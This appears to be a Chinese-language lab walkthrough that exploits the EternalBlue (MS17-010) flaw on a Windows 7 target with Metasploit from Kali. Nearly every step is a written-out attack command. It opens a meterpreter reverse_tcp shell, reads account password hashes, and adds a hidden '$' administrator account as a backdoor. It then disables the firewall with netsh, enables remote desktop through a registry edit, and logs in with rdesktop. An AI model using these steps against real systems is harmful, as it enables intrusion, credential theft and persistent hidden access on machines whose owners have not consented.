准備:
kali為攻擊機,ip:172.17.2.132

win7為靶機, ip:172.17.2.64
使用msf模塊。需要在同一局域網中。
步驟:
1.啟動數據庫服務
service postgresql start

2.開啟msf

3.搜索永恆之藍

4.使用永恆之藍ms17-010漏洞
use auxiliary/scanner/smb/smb_ms17_010

5.查看選項
show options

6.查看靶機ip地址

172.17.2.64
7.設置rhosts為靶機地址

8.運行run

9.掃描具體的ms17_010(永恆之藍漏洞)
search name:ms17 type:exploit

10.選擇第0個。
use exploit/windows/smb/ms17_010_eternalblue
10(1)如果目標為win2003,則選擇
use exploit/windows/smb/ms17_010_psexec
11.查看需要配置的選項。

12.設置rhosts為靶機ip。

13..顯示攻擊載荷。

14.選擇設置windows/x64/meterpreter/reverse_tcp的攻擊載荷
set payload windows/x64/meterpreter/reverse_tcp

15.再次查看配置。

16.檢查無誤后運行

17.運行成功,連接上。help或者?可以打開幫助。

18.getuid,獲取靶機賬戶

19.查看靶機的用戶名及密碼,可以看到cover為賬戶,:后的md5為密碼。

如果md5破解不出,可以添加賬戶。
19. shell.

20.看到出現亂碼了,chcp 65001 可以解決。

21.net user,查看用戶

22.添加qwer用戶 密碼為123456789

22(1)
添加隱藏賬戶
net user test$ 123456 /add
提權至管理員賬戶
net localgroup administrators test$ /add
注:
用戶名要以$結尾
添加后,該帳戶可在一定條件下隱藏,輸入net user無法獲取
23.將qwer提至管理員權限。

關閉防火牆
命令:netsh firewall set opmode mode=disable
查看防火牆狀態:netsh firewall show state
24.安裝遠程桌面軟件
apt-get install rdesktop
24.REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 打開3389遠程連接端口

25.在命令符中輸入
rdesktop 172.17.2.64 進入遠程連接。

隱藏賬戶要加入$

連接成功。
